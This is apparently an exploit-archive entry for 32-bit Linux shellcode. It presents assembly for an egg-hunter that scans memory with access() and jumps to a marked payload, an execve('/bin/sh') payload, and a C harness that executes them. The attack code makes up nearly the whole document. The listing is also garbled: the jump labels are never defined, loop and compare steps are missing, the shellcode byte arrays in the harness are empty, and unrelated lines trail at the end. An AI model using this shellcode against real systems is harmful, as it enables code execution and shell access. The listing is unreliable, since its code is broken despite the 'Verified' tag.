Linux/x86 - EggHunter + access() Shellcode (38 bytes)

Author: Paolo Perego Published: 2018-05-31 Verified: Verified



; Filename: egghunter.nasm
; Author: Paolo Perego <>
; Website:
; Blog post:
; Twitter:    @thesp0nge
; SLAE-ID:    1217
; Purpose: This is the first stage of our payload. An egg-hunter shellcode
; looping through memory and jumping on the payload after the
; second egg found in memory.
global _start
section .text
xor ecx, ecx
mul ecx
or dx, 0xfff
; EDX is 4096 here, that is the value of PAGE_SIZE constant
inc edx
; EBX is our memory cursor
lea ebx, [edx+0x4]
xor eax, eax
; access is defined as #define __NR_acces 33 in
; /usr/include/i386-linux-gnu/asm/unistd_32.h:
; system call prototype is:
; int access(const char *pathname, int mode);
mov al, 0x21
int 0x80
cmp al, 0xf2 ; 0xf2 is the opcode for EFAULT. If my register
; has this value, a signal for a invalid page
; access it has been received
jz next_page
mov eax, key
mov edi, edx
jnz next_addr
jnz next_addr
; At this point we are at the very beginning of our shellcode, after
; the second key. We can jump to it
jmp edi
section .data
key equ 0xdeadbeef
; Filename: execve.nasm
; Author: Paolo Perego <>
; Website:
; Blog post:
; Twitter:    @thesp0nge
; SLAE-ID:    1217
; Purpose: This is the default payload for the egg hunter demo. It will
; execute "/bin/sh" using execve() system call.
global _start
dd 0xdeadbeef
dd 0xdeadbeef
section .text
xor eax, eax ; init EAX to 0
push eax ; pushing 0 to the stack to be used as NULL pointer
; execve is defined as #define __NR_execve 11 in
; /usr/include/i386-linux-gnu/asm/unistd_32.h:
; system call prototype is:
        ; int execve(const char *filename, char *const argv[], char *const
push 0x68732f2f ; pushing //bin/sh into the stack
push 0x6e69622f ; the init double / is for alignment purpose
mov ebx, esp ; pointer to *filename
push eax ; pushing in the stack a pointer to NULL
mov edx, esp ; I don't care about environment here
push eax
mov ecx, esp ; I don't even care about passing arguments to
; my /bin/sh
mov al, 0xb ; execve = 11
int 0x80
unsigned char egg_hunter[] = \
unsigned char code[] = \
int main(int argc, char **argv)
printf("Shellcode Length:  %d\n", strlen(code));
printf("Egghunter Length:  %d\n", strlen(egg_hunter));
int (*ret)() = (int(*)())egg_hunter;
$ cd /pub
$ more beer
I pirati della sicurezza applicativa: